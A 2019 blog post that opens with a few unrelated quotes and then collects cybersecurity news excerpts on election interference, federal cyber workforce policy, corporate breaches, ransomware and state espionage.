Friday, May 10, 2019

MEdia Dragon: UK Government Announces Cyber Security Ambassador

Wasn’t it Talleyrand who said, ‘After eighty, there are no enemies, only survivors’?” Louis Auchlncloss, The House of the Prophet (this Talleyrand “quote” cannot be traced to a primary source) ... [read more]

Talleyrand also traced MEdia Dragon and Internal audit to the field of medicine terminology as we know what doctors need to reach internally when you start celebrating recycling teenagers years  ...



Shane Snow – journalist, geek, best selling author: "two heads are better than one – but only if they think differently". A great reason to support diversity in HR hiring and development practices.

The cold river “flows up the map,” they used to say, first south, then west, and then north, and through some of the most verdant and beautiful country in America. It is called the Tennessee, but it drains some forty thousand square miles of land in seven states, from the Blue Ridge Mountains to Alabama, and from Mississippi to the Ohio River, an area nearly the size of En­gland.
Before the 1930s, it ran wild, threatening each spring to flood and wash away the humble farms and homes along its banks. Most of it was not navigable for any distance, thanks to “an obstructive fist thrust up by God or Devil”—as the writer George Fort Milton characterized it—that created a long, untamed run of rapids known as Muscle Shoals. The fist dropped the river 140 feet over the course of 30 miles, and therein lay the untapped potential of the Tennessee, the chance to make power—a lot of it—out of water.
Where Our New World Begins Harpers.




CNN

May 3, 2019

Two members of Congress who represent Florida are demanding a classified briefing from the Justice Department for the state's congressional delegation regarding the claim that Russia successfully hacked into at least one Florida county network before the 2016 election. “We are determined to learn as much as we can about what transpired so that, as lawmakers, we can take appropriate steps to prevent such intrusions from reoccurring in the future," US Reps. Stephanie Murphy, a Democrat, and Michael Waltz, a Republican, wrote in a letter dated Thursday to Attorney General William Barr and FBI Director Christopher Wray. Murphy and Waltz said the special counsel Robert Mueller's report "raises a host of critically-important questions that require answers."



CNN

May 2, 2019

The Government Accountability Office has urged the Census Bureau to step up its efforts to implement hundreds of action items on its cybersecurity to-do list, as well as recommendations made by the Department of Homeland Security. GAO, in a report released Tuesday, said the bureau still needs to address more than 500 cybersecurity vulnerabilities discovered during its security reviews, about half of which the bureau considers “high-risk” or “very high-risk.” The watchdog office also recommends that Census develop a formal process for tracking and implementing the 17 cybersecurity recommendations the Department of Homeland Security has made to the Bureau over the past two years. Nick Marinos, GAO’s director of information technology and cybersecurity, told members of the House Appropriations Subcommittee on Commerce, Justice, Science and Related Agencies that shoring up these vulnerabilities would reduce the Bureau’s overall risk of a data breach.



Politico

May 1, 2019

Senate Democrats and Republicans can agree on perhaps just one thing about special counsel Robert Mueller’s investigation — that Russia interfered in the 2016 presidential election. But bipartisan legislation to address foreign intrusions is all but dead amid a distinct lack of enthusiasm from Senate GOP leadership and the Trump White House. At a heated hearing with Attorney General William Barr on Wednesday, Sen. Amy Klobuchar (D-Minn.) blasted the White House for blocking the election security bill she co-sponsored with Sen. James Lankford (R-Okla.) in the previous Congress. And in an interview, Klobuchar put the blame for the impasse squarely on President Donald Trump’s former White House counsel Don McGahn as well as Senate Majority Leader Mitch McConnell. “It was Don McGahn,” Klobuchar said Wednesday. “He called Republicans about the bill, didn’t want them to do it. And McConnell also didn’t want the bill to move forward. So it was a double-edged thing.”


Nextgov

May 1, 2019

A Senate bill passed unanimously Tuesday would create a civilian personnel rotation program for federal cybersecurity professionals. The bipartisan Federal Rotational Cyber Workforce Program Act of 2019, authored by Sens. Gary Peters, D-Mich., and John Hoeven, R-N.D., would establish a rotational system to allow select IT and cybersecurity professionals to apply for duty assignments of between 180 days and one year. Under the program, existing federal tech talent would have avenues to bolster their training and experience, while smaller agencies would gain access to cyber employees who can improve their security posture. “I’m pleased the Senate passed this bipartisan bill to help the federal government recruit and retain highly skilled cybersecurity professionals, address staffing challenges in agencies across government, and strengthen our ability to combat cybersecurity threats and secure our systems,” Peter said in a statement.



FCW

May 1, 2019

The Transportation Security Administration has submitted a plan to keep pipeline cybersecurity guidelines up to date, the Government Accountability Office's acting director told a May 1 House Energy and Commerce Energy Subcommittee hearing on pipeline security. TSA has federal oversight responsibility for the physical security and cybersecurity of oil, natural gas and hazardous materials pipelines in the U.S. That pipeline infrastructure is mostly privately held. In his testimony at the hearing, GAO Acting Director William Russell referenced his agency's December 2018 report on TSA's pipeline oversight. In that report, the GAO had recommended TSA formally document its review and revision processes for its Pipeline Security Guidelines for private pipeline infrastructure providers. The GAO also found weakness in TSA's cybersecurity workforce, as well as a shortage of workers. The watchdog agency said staffing levels for the agency's pipeline branch have fluctuated "significantly" from a single worker in 2014, to six between 2015 and 2018. Those workers, it said, lacked cybersecurity expertise.



ADMINISTRATION



AP

May 2, 2019

While candidates were focused on campaigning in 2016, Russians were carrying out a devastating cyber operation that changed the landscape of American politics, with aftershocks continuing well into Donald Trump's presidency. And it all started with the click of a tempting email and a typed-in password. Whether presidential campaigns have learned from the cyberattacks is a critical question ahead as the 2020 election approaches. Preventing the attacks won't be easy or cheap. "If you are the Pentagon or the NSA, you have the most skilled adversaries in the world trying to get in but you also have some of the most skilled people working defense," said Robby Mook, who ran Hillary Clinton's campaign in 2016. "Campaigns are facing similar adversaries, and they don't have similar resources and virtually no expertise." Traditionally, cybersecurity has been a lower priority for candidates, especially at the early stages of a campaign. They need to raise money, hire staff, pay office rents, lobby for endorsements and travel repeatedly to early voting states. Particularly during primary season, campaign managers face difficult spending decisions: Air a TV ad targeting a key voting demographic or invest in a more robust security system for computer networks?



CyberScoop

May 2, 2019

The White House issued an executive order Thursday that is intended to bolster the nation’s cybersecurity workforce. The order includes provisions geared toward the federal government’s employees, as well as education and career development initiatives for the U.S. workforce in general. The goal is to build a “superior cybersecurity workforce,” one senior administration official told reporters on a call about the order Thursday. The White House wants to create a President’s Cup Cybersecurity Competition that “will identify, challenge, and reward the government’s best personnel supporting cybersecurity and cyber excellence,” one official said on the call. Other elements include allowing cybersecurity employees to rotate among agencies and using new cybersecurity aptitude tests as part of efforts to reskill federal workers.



Ars Technica


AvengerCon was the brainchild of Capt. Skyler Onken and Capt. Steve Rogacki. Until recently, Onken was company commander for Alpha Company 781st Military Intelligence Battalion, a component of the 780th MI Brigade—nicknamed "the Avengers," thus the event's name. He has now moved on to the US Army Cyber School at Fort Gordon, Georgia. Rogacki is an officer from a unit at Fort Gordon, Georgia. The two came up with the idea for AvengerCon while attending DEF CON a few years ago. While sitting at a Johnny Rockets at the Flamingo Hotel in Las Vegas, Onken said, the two were reveling in the experience of DEF CON. "It's such great experience just being a part of the [hacker] community, the things you learn, things you get to try, it gets you excited," he recalled. "And we were like, 'We wish that the soldiers could get that.'"



AP

May 2, 2019

A British cybersecurity researcher credited with stopping a worldwide computer virus in 2017 has pleaded guilty in Wisconsin federal court to developing malware to steal banking information. Marcus Hutchins appeared in court Thursday after he agreed last month to plead guilty to developing a malware called Kronos and conspiring to distribute it from 2012 to 2015. Prosecutors dismissed eight more charges in exchange for his plea. Sentencing for Hutchins is set for July 26. He faces up 10 years in prison but could receive a more lenient sentence for accepting responsibility.



Nextgov

May 1, 2019

Under the White House’s new shared services policy, the Homeland Security Department has been chosen as the official lead agency for all cybersecurity acquisitions, programs and standards across government. Security leaders at federal agencies say they’re on board with this structure, so long as Homeland Security officials don’t try to force everyone into the same box. Homeland Security was named as the Quality Services Management Office for cybersecurity, a new designation that puts the department at the center of all cybersecurity decisions governmentwide. As agencies improve their existing capabilities or stand up new ones, Homeland Security will have authority to set the standards by which those agencies operate. “I actually appreciate the top-cover,” said Eric Rippetoe, chief information security officer for the Federal Energy Regulatory Commission. “A lot of these things that they’re telling us to do, I’ve been trying to do anyway.”



The Marine Corps Times

May 1, 2019

Plans to bolster the Marine Corps’ cohort of cyber experts are moving forward, but this new unit won’t be donning the Marine Corps uniform. The Corps will create a new Cyber Auxiliary division, Commandant Gen. Robert Neller said Monday, and its new force will not be beholden to strict Marine grooming standards. “We are going to do a Marine Corps Cyber Auxiliary, for the record,” Neller said at the Future Security Forum in Washington. “If anybody wants to join, you can sign up. You can have purple hair, too, but no [Eagle, Globe and Anchor]." The comment was easy to dismiss as a joke, but Marine officials said the Cyber Auxiliary unit is a serious endeavor that is moving forward, although confirmed details are scarce. “I will confirm, however, that the CMC was not joking about the creation of a new cyber unit,” said Capt. Joseph Butterfield, Headquarters Marine Corps spokesman.



CyberScoop


As hackers continue to use native programming tools to blend into target networks, Mitre Corp. is beginning to test vendors’ ability to detect those techniques. The federally-funded, not-for-profit organization announced Wednesday it would throw the stealthy tactics of an infamous hacking group, the Russian-government-linked APT29, at several threat-detection products. But the evaluation is about more than one set of adversaries. The “living off the land” techniques, such as hiding in PowerShell scripts, that will be tested are increasingly popular with a variety of hacking groups. “A lot of these techniques are going to be implemented in similar ways from different adversaries,” said Frank Duff, Mitre’s lead for evaluations that use the organization’s ATT&CK framework. “PowerShell monitoring is that next thing that everyone recognizes is absolutely necessary,” he added. Mitre’s last round of testing focused on advanced persistent threats, mimicking the tactics of APT3, a China-based group known for using internet-browser exploits. But the techniques of APT29, best known for being one of two Russian outfits to breach the Democratic National Committee before the 2016 U.S. election, will be a stiffer test, according to Duff.



The Washington Post

April 30, 2019

In recent months, U.S. national security officials have been preparing for Russian interference in the 2020 presidential race by tracking cyber threats, sharing intelligence about foreign disinformation efforts with social media companies and helping state election officials protect their systems against foreign manipulation. But these actions are strikingly at odds with statements from President Trump, who has rebuffed warnings from his senior aides about Russia and sought to play down that country’s potential to influence American politics. The president’s rhetoric and lack of focus on election security has made it tougher for government officials to implement a more comprehensive approach to preserving the integrity of the electoral process, current and former officials said. Officials insist that they have made progress since 2016 in hardening defenses. And top security officials, including the director of national intelligence, say the president has given them “full support” in their efforts to counter malign activities. But some analysts worry that by not sending a clear, public signal that he understands the threat foreign interference poses, Trump is inviting more of it.



SC Magazine

April 30, 2019

The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) today issued a list of the 55 areas of the nation’s critical infrastructure that it believes must be protected from cyberattacks. The National Critical Functions list was created by CISA’s National Risk Management Center and contains functions used or supported by the government and the private sector “that are of such vital importance to the United States that their disruption, corruption or dysfunction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof,” CISA said. The list was developed with the help of all 16 critical infrastructure sectors; all Sector-Specific Agencies; and the State, Local, Tribal, and Territorial (SLTT) Government Coordinating Council. “Identifying these National Critical Functions has been a collaborative process between public and private sector partners and marks a significant step forward in the way we think about and manage risk,” said CISA Director Christopher Krebs.



FCW


The Department of Homeland Security released a new Binding Operational Directive April 29 that cuts down on the time federal agencies have to patch critical IT vulnerabilities in half, from 30 days to 15. The order compels all civilian federal agencies to regularly review weekly cyber hygiene reports delivered by DHS that identify both critical and high vulnerabilities and patch them within 15 and 30 calendar days of being detected, not when agencies are first informed about them. According to the directive, CISA is exploring a way to send real-time alerts to agencies when a vulnerability is discovered so they don't have to wait for the weekly hygiene reports to start patching. If agencies fail to patch within those timeframes, DHS will essentially write a remediation plan for them and begin addressing the problem with top IT officials at the agency.



INDUSTRY



Computer Weekly

May 3, 2019

Norwegian aluminium giant Norsk Hydro is urging partners to be cautious in the wake of a damaging ransomware attack in March as financial impact estimates come in above initial estimates. Initial estimates put the financial impact of Norsk Hydro’s ransomware attack in March at around $41m, but latest estimates put the cost at between $45.6m and $51.3m. The company has issued a warning to partners that malicious actors could contact them pretending to represent the aluminium producer. “This may be an attempt to spread the virus further or deceive our customers, suppliers or other partners,” the company said in a warning on its website. “We therefore ask our partners to show extra caution when receiving emails from Hydro during this period. For instance, please note that Hydro is not under any circumstances asking our partners to change bank accounts. Anyone who is in doubt about the credibility of an email from Hydro should call the sender to verify,” the warning said. The Norwegian National Security Authority (NSM), which was alerted to the attack, identified the ransomware involved as LockerGoga, which was linked to an attack on French engineering consultancy Altran Technologies in January.



CyberScoop

May 3, 2019

or years, software, not hardware, has dominated the cybersecurity industry’s efforts to develop a coordinated way of disclosing technology flaws. Software bugs are reported in much greater numbers, and there are far fewer researchers who specialize in hardware security. But hardware was thrust into the limelight in January 2018, when Spectre and Meltdown, two vulnerabilities that affected virtually all modern computer chips, were made public. The flaws could have allowed hackers to infiltrate a computer’s memory and steal sensitive data, or trick applications into spilling information without a user’s knowledge. While there’s no evidence either has been exploited, the revelation that they exist, and the complex patching process that followed, sparked industry-wide awareness about serious security flaws that might come embedded in otherwise trusted technology. Now, more than a year later, the vendors, researchers, and manufacturers involved are still trying to cut down on the time it takes to get hardware-related patches deployed.



CNBC

May 2, 2019

Electrical grid operations in two huge U.S. population areas — Los Angeles County in California, and Salt Lake County in Utah — were interrupted by a distributed-denial-of-service attack in March, according to the Department of Energy’s Electric Emergency and Disturbance Report for March. The attack did not disrupt electrical delivery or cause any outages, the Department of Energy confirmed, but caused “interruptions” in “electrical system operations.” In this case, “operations” does not refer to electrical delivery to consumers, but could cover any computer systems used within the utilities, including those that run office functions or operational software. Although the attack did not interrupt service, denial-of-service attacks are easily preventable, and most large organizations no longer consider them major threats. The fact that it succeeded calls into question whether the utilities are prepared for a far more sophisticated attack, as the U.S. government has warned about.



Gov Info Security

May 1, 2019

Citrix says the data breach it first disclosed in early March appears to have persisted for six months before being discovered. The company believes it has now expelled any hackers from its network. The technology giant, which is based in Fort Lauderdale, Florida, was alerted to the suspected intrusion on March 6 by the FBI and then launched an investigation, which is ongoing. Citrix on Monday submitted a data breach notification to the California attorney general's office, as TechCrunch first reported. Such notifications are required by law in all 50 states for many types of breaches that result in residents' personal details being exposed.



Ars Technica

April 30, 2019

Attackers have been actively exploiting a critical zero-day vulnerability in the widely used Oracle WebLogic server to install ransomware, with no clicking or other interaction necessary on the part of end users, researchers from Cisco Talos said on Tuesday. The vulnerability and working exploit code first became public two weeks ago on the Chinese National Vulnerability Database, according to researchers from the security educational group SANS ISC, who warned that the vulnerability was under active attack. The vulnerability is easy to exploit and gives attackers the ability to execute code of their choice on cloud servers. Because of their power, bandwidth, and use in high-security cloud environments, these servers are considered high-value targets. The disclosure prompted Oracle to release an emergency patch on Friday.



BBC

April 30, 2019

Vodafone has denied a report saying issues found in equipment supplied to it by Huawei in Italy in 2011 and 2012 could have allowed unauthorised access to its fixed-line network there. A Bloomberg report said that Vodafone spotted security flaws in software that could have given Huawei unauthorised access to Italian homes and businesses. The US refuses to use Huawei equipment for security reasons. However, reports suggest the UK may let the firm help build its 5G network. This is despite the US wanting the UK and its other allies in the "Five Eyes" intelligence grouping - Canada, Australia and New Zealand - to exclude the company. In a statement, Vodafone said: "The issues in Italy identified in the Bloomberg story were all resolved and date back to 2011 and 2012. The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”



Vice Motherboard

April 30, 2019

Hackers have broken into an internet infrastructure firm that provides services to dozens of the world’s largest and most valuable companies, including Oracle, Volkswagen, Airbus, and many more as part of an extortion attempt, Motherboard has learned. The attackers have also released data from all of those companies, according to a website seemingly set up by the hackers to distribute the stolen material. Citycomp, the impacted Germany-based firm, provides servers, storage, and other computer equipment to large companies, according to the company’s website. Michael Bartsch, executive director of Deutor Cyber Security Solutions, a firm Citycomp said was authorized to speak about the case, confirmed the breach to Motherboard in an email Tuesday. “Citycomp has been hacked and blackmailed and the attack is ongoing,” Bartsch wrote. “We have to be careful as the whole case is under police investigation and the attacker is trying all tricks.”



The Washington Post

April 30, 2019

The auto industry is downplaying the immediate risk of car-hacking after a report about a cyber-intruder’s use of GPS trackers that allowed him to monitor the location of thousands of vehicles in commercial fleets and even turn off their engines. “Hacking is not like you see it on TV,” said Gloria Bergquist, a spokeswoman for the Alliance of Automobile Makers. But she said automakers take the threat seriously and are focusing more on shielding vehicles’ computer systems from possible intruders. “Vehicles are highly complex with multiple layers of security, and remote access is exceedingly difficult by design,” Bergquist said in an email. “New cars being launched now have an exponential increase in cybersecurity. Automakers are collaborating in all areas possible, including hardware, software and knowledge sharing with suppliers, government and the research community.” Motherboard reported last week that the hacker — identified only by the handle L&M — cracked more than 7,000 iTrack accounts and more than 20,000 Protrack accounts that some companies use to manage their commercial fleets through GPS signals.



Business Insider

April 30, 2019

The CEOs of some of the top financial institutions in America are increasingly worried about the risk of a cybersecurity attack on the nation's financial system. Speaking at the Milken Global Institute, David Hunt, CEO of Prudential Global Investment Management, was the latest executive to highlight the risk. "The next crisis is going to come from a different place," Hunt said. "I think it's going to come from technology and cyber. If I were looking for the thing that worries me the most, it would be an actual attack on the infrastructure of the financial markets that really bursts into it and creates a shutdown of the major pipes we use to do business." Several other Wall Street institutions have also warned of the risks of a cyberattack. In his 2019 annual letter to shareholders, JPMorgan CEO Jamie Dimon said cybersecurity "may very well be the biggest threat to the US financial system."



Gov Info Security

April 29, 2019

Nearly 2 million internet of things devices, including security cameras, baby monitors and "smart" doorbells, are vulnerable to being compromised due to a flaw in their built-in peer-to-peer software, a security researcher warns. Paul Marrapese, an independent security researcher from San Jose, California, has published research warning that peer-to-peer software developed by Chinese firm Shenzhen Yunni Technology that's used in millions of IoT devices around the world has a vulnerability that could allow an attacker to eavesdrop on conversations or press household items into service as nodes in a botnet. The Shenzhen Yunni software, called iLnkP2P, is designed to enable a user to connect to IoT devices from anywhere by using a smartphone app. The iLnkP2P functionality is built into a range of products from companies that include HiChip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.



ZDNet

April 29, 2019

The extent of the cyberattack was so bad that it just didn't seem possible that something so destructive could have happened so quickly. "I remember that morning – laptops were sporadically restarting and it didn't appear to be a cyberattack at the time but very quickly the true impact became apparent," said Lewis Woodcock, head of cybersecurity compliance at Moller-Maersk, the world's largest container shipping firm. "The severity for me was really taken in when walking through the offices and seeing banks and banks of screens, all black. There was a moment of disbelief, initially, at the sheer ferocity and the speed and scale of the attack and the impact it had." Speaking in a keynote session at CYBER UK 19 – a cybersecurity conference hosted by the UK's National Cyber Security Centre (NCSC) – Woodcock was reliving the events of 27 June 2017 when the shipping and logistics giant Maersk was an unintended victim of NotPetya ransomware. The company was one of the most badly hit of those caught in the crossfire of NotPetya, with almost 50,000 infected endpoints and thousands of applications and servers across 600 sites in 130 countries. While Maersk did lose revenue, it pulled through thanks to what Woodcock described as "a whole company effort to recover" which was aided by input from partners, vendors and customers.



Vice Motherboard

April 27, 2019

Docker, a company that makes software tools for programmers and developers, said on Friday that hackers had accessed one of its Docker Hub databases and could have stolen sensitive data from around 190,000 accounts. Experts Motherboard spoke to said that, in a worst-case scenario, the hackers would have been able to access proprietary source code from some of those accounts. Specifically, Docker allows developers to run software packages known as “containers.” It is used by some of the largest tech companies in the world, though it is not yet publicly known what information was accessed and which companies’ accounts were affected. Docker disclosed the breach in an email to customers and users of Docker Hub, its cloud-based service that’s used by several companies and thousands of developers all over the world. In the email, obtained by Motherboard, Docker said that the stolen data includes “usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.”



INTERNATIONAL



AP

May 3, 2019

Cybersecurity officials from dozens of countries drew up a blueprint on Friday to counter threats and ensure the safety of next generation mobile networks that their nations are set to start deploying. Officials hammered out a set of non-binding proposals published at the end of a two-day meeting organized by the Czech government to discuss the security of new 5G networks. The meeting comes amid a simmering global battle between the U.S. and China's Huawei, the world's biggest maker of network infrastructure equipment. The U.S. has been lobbying allies to ban Huawei from 5G networks over concerns China's government could force the company to give it access to data for cyberespionage. Huawei has denied the allegations. Officials called for a cooperative approach to security, saying that they didn't want to target specific countries or companies.



Wired

May 3, 2019

A software supply chain attack represents one of the most insidious forms of hacking. By breaking into a developer's network and hiding malicious code within apps and software updates that users trust, supply chain hijackers can smuggle their malware onto hundreds of thousands—or millions—of computers in a single operation, without the slightest sign of foul play. Now what appears to be a single group of hackers has managed that trick repeatedly, going on a devastating supply chain hacking spree—and becoming more advanced and stealthy as they go. Over the past three years, supply chain attacks that exploited the software distribution channels of at least six different companies have now all been tied to a single group of likely Chinese-speaking hackers. They're known as Barium, or sometimes ShadowHammer, ShadowPad, or Wicked Panda, depending on which security firm you ask. More than perhaps any other known hacker team, Barium appears to use supply chain attacks as their core tool. Their attacks all follow a similar pattern: Seed out infections to a massive collection of victims, then sort through them to find espionage targets.



CyberScoop

May 3, 2019

China’s cyber-theft and cyber-espionage operations are accelerating to the point that they can “degrade core U.S. operational and technological advantages,” according to a congressionally mandated assessment of the Chinese military the Pentagon issued Friday. Last year, for example, Chinese intelligence officers were indicted for allegedly conspiring to steal technological information on turbofan engines. China’s efforts to steal sensitive U.S. military-grade equipment more broadly targeted aviation and antisubmarine warfare technologies last year. “The threat and the challenge is persistent. The Chinese remain very aggressive in their use of cyber,” Assistant Secretary of Defense Randall G. Schriver said Friday during a press briefing on the report. China’s efforts to boost its technological prowess go beyond thefts and intrusions, the Pentagon said. Beijing also leverages its intelligence services and Chinese nationals’ access to technologies to try building up its military capabilities while checking adversaries’, the report notes.



The Sydney Morning Herald

May 3, 2019

Former prime minister Malcolm Turnbull's handpicked cybersecurity tsar Alastair MacGibbon is quitting his role and has declared cyber attacks "the greatest existential threat we face". Mr. MacGibbon has been the face of cybersecurity for federal authorities for the past three years, handling the public response to the cyberattack on the national census in 2016 and the hacking earlier this year of the Parliament and the major political parties. The announcement of Mr. MacGibbon's resignation from the role of national cyber security adviser comes just two weeks before the federal election, but he stressed he was not stepping down because of any possible change of government. While saying he didn't downplay the seriousness of threats such as terrorism or long-term challenges such as climate change, Mr. MacGibbon said the sheer scale and rising likelihood of major cyber attacks made them the most pressing threat a country like Australia faces. "Should a successful, major cyber attack occur, it can cripple a society," he said.



The New York Times

May 2, 2019

Trade negotiations between the United States and China are entering the final stage, but a deal is expected to fall short of addressing several key Trump administration goals, including combating Chinese cybertheft and state subsidies at various levels of the Chinese government, officials from a leading American business group said on Thursday. President Trump has repeatedly insisted that a United States-China trade deal will address what he says is a pattern of China illegally gaining access to American computer networks. He has also said it will end economic practices like subsidies that the United States says gives China an unfair competitive edge. But Chinese negotiators have pushed back against discussing cybertheft in the context of the negotiations, arguing for the issue to be dealt with in a different forum, Myron Brilliant, the executive vice president and head of international affairs at the U.S. Chamber of Commerce, said on Thursday in a call with reporters.



ZDNet

May 1, 2019

For the past three years, a mysterious hacker has been selling Windows zero-days to at least three cyber-espionage groups, as well as cyber-crime gangs, researchers from Kaspersky Lab have told ZDNet. The hacker's activity reinforces recent assessments that some government-backed cyber-espionage groups --also known as APTs (advanced persistent threats)-- will regularly buy zero-day exploits from third-party entities, besides developing their own in-house tools. APT groups believed to be operating out of Russia and the Middle East have often been spotted using zero-days developed by real-world companies that act as sellers of surveillance software and exploit brokers for government agencies. However, Kaspersky's recent revelations show that APT groups won't shy away from dipping their toes in the underground hacking scene to acquire exploits initially developed by lone hackers for cyber-crime groups, if ever necessary.



CyberScoop

May 1, 2019

Russia and China have intensified their offensive cyber-espionage efforts in the Netherlands, the Dutch domestic intelligence service (AIVD) announced this week in its annual report of 2018. While Chinese cyber spies have sought to steal intellectual property from Dutch targets, the AIVD noted, Russian hackers and propagandists have worked for years to advance the Kremlin’s geopolitical interests by harassing watchdog and government agencies in the Netherlands. These efforts come amid broader foreign influence and offensive cyber campaigns from Russia, China, and Iran that also target the U.S., which the Office of the Director of National Intelligence said are increasing. Russia has focused on everything from spreading disinformation on the downing of Malaysia Airlines Flight 17 — just as Dutch-led investigators pinpointed the attack on Russia — to attempting to hack into the chemical weapons watchdog, the Organization for the Prohibition of Chemical Weapons in 2018, as Russia was under fire for a chemical weapons attack in England.



Foreign Policy

May 1, 2019

The hacker realized that he was being watched. The spy software he was attempting to run against the Ukrainian government had infected the wrong machine, and now an analyst working for an American security company was picking apart the program—known as RatVermin—trying to understand how it worked. The hacker, likely working on behalf of the Luhansk People’s Republic, a breakaway region of Eastern Ukraine, first tried to run a ransomware program dubbed Hidden Tear to scramble the contents of the computer it had mistakenly infected. The program would have made the computer useless to the analyst and flashed a sardonic message: “Files have been encrypted with hidden tear. Send me some bitcoins or kebab. And I also hate night clubs, desserts, being drunk.” But the analyst blocked the program from executing, and then, for a few hours on March 20, 2018, the two engaged in the digital equivalent of hand-to-hand combat. The hacker tried to delete the software being used by the analyst to understand RatVermin, a custom-made all-purpose spy tool. The analyst simply reset the machine and booted RatVermin back up, this time with a question displayed on the screen: Why had the hacker tried to run ransomware on the computer? The hacker replied with a one-word question: “Mad ?”







Infosecurity Magazine

April 30, 2019

The UK government has announced the appointment of a new cybersecurity ambassador to promote the nation’s expertise in the sector to potential export markets. Henry Pearson joins the Department for International Trade (DIT) from previous stints as adviser for GCHQ’s National Cyber Security Centre (NCSC), the Ministry of Defence, and BAE Applied Intelligence’s Detica. He’ll be tasked with working closely with UK cybersecurity businesses looking to sign overseas deals with governments and central banks. According to the DIT, his work will mainly be focused on the Gulf and south-east Asia. “The UK’s reputation for cyber expertise is recognized worldwide and my department is committed to ensuring the UK fulfils its global potential, with cyber exports projected to be worth £2.6bn by 2021,” said international trade secretary Liam Fox, in a statement.



TECHNOLOGY



The Atlantic

April 30, 2019

One day last June, Doug Boss pulled into a police-station parking lot to meet a stranger from Craigslist. His purpose: to buy used insulin pumps. Boss has type 1 diabetes, and he relies on a small pump attached to his body to deliver continuous doses of insulin that keep him alive. To be clear, he didn’t need to buy used medical equipment on Craigslist. Boss, who is 55 and works in IT in Texas, has health insurance. He even has a new, in-warranty pump sitting at home. But he was thrilled to find on Craigslist a coveted old model that was made by the medical-device company Medtronic and discontinued years ago. What makes these outdated Medtronic pumps so desirable is, ironically, a security flaw. Boss was looking for a pump or two he could hack.